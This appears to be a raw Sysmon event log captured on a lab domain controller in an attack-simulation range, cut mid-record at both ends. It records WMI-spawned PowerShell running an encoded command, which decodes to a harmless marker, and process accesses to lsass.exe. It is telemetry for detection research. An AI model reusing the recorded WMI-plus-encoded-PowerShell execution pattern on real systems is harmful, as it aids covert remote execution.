657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236618Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.950{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0D00-00000000AD01}620C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236617Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.950{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0C00-00000000AD01}588C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236616Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.950{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229D-6039-0B00-00000000AD01}852C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236615Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.934{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229D-6039-0900-00000000AD01}792C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000002236614Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.934{05ADC7E1-6D63-603E-70AA-00000000AD01}3652ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_i2a11i1c.eba.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002236613Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.934{05ADC7E1-6D63-603E-70AA-00000000AD01}3652ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_uhvnt33r.fns.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002236612Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.934{05ADC7E1-29F0-6039-C005-00000000AD01}49441064C:\Windows\system32\csrss.exe{05ADC7E1-6D63-603E-73AA-00000000AD01}10076C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 23542300x80000000000000002236611Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.934{05ADC7E1-6D63-603E-6CAA-00000000AD01}5176ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002236610Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.934{05ADC7E1-29F0-6039-C005-00000000AD01}49443952C:\Windows\system32\csrss.exe{05ADC7E1-6D63-603E-72AA-00000000AD01}6720C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002236609Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.934{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002236608Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.934{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002236607Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.934{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002236606Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.934{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002236605Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.934{05ADC7E1-229D-6039-0500-00000000AD01}6361168C:\Windows\system32\csrss.exe{05ADC7E1-6D63-603E-72AA-00000000AD01}6720C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002236604Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.934{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D63-603E-72AA-00000000AD01}6720C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\wbem\cimwin32.dll+3adce|C:\Windows\system32\wbem\cimwin32.dll+3d475|C:\Windows\system32\wbem\cimwin32.dll+3ab15|C:\Windows\system32\wbem\cimwin32.dll+3b393|C:\Windows\system32\wbem\cimwin32.dll+3bb40|C:\Windows\SYSTEM32\framedynos.dll+20256|C:\Windows\SYSTEM32\framedynos.dll+218b5|C:\Windows\system32\wbem\wmiprvse.exe+1704a|C:\Windows\system32\wbem\wmiprvse.exe+1724f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4 154100x80000000000000002236603Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.934{05ADC7E1-6D63-603E-72AA-00000000AD01}6720C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEpowershell.exe -NoProfile -Enc VwByAGkAdABlAC0ASABvAHMAdAAgAGMANAAzADcAMABhADMAYgAtAGQANQAzADAALQA0ADIAOQBjAC0AOQBiADIAZgAtADUAZQAzADcAMwA0ADMAZQAzAGMAMAA5AA==C:\Windows\system32\ATTACKRANGE\Administrator{05ADC7E1-29F1-6039-B11D-350000000000}0x351db12HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{05ADC7E1-6D63-603E-6BAA-00000000AD01}6344C:\Windows\System32\wbem\WmiPrvSE.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding 10341000x80000000000000002236602Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.918{05ADC7E1-229F-6039-1600-00000000AD01}15401672C:\Windows\system32\svchost.exe{05ADC7E1-6D63-603E-6EAA-00000000AD01}5340C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002236601Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.918{05ADC7E1-229F-6039-1600-00000000AD01}15401572C:\Windows\system32\svchost.exe{05ADC7E1-6D63-603E-6EAA-00000000AD01}5340C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 11241100x80000000000000002236600Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.918{05ADC7E1-6D63-603E-70AA-00000000AD01}3652C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_uhvnt33r.fns.ps12021-03-02 16:52:51.918 10341000x80000000000000002236599Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.903{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D63-603E-71AA-00000000AD01}8992C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236598Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.903{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D63-603E-70AA-00000000AD01}3652C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236597Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.903{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D63-603E-6FAA-00000000AD01}12376C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236596Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.903{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D63-603E-6EAA-00000000AD01}5340C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236595Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.903{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-6D63-603E-70AA-00000000AD01}3652C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002236594Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.903{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D63-603E-6DAA-00000000AD01}2536C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236593Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.903{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D63-603E-6CAA-00000000AD01}5176C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236592Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 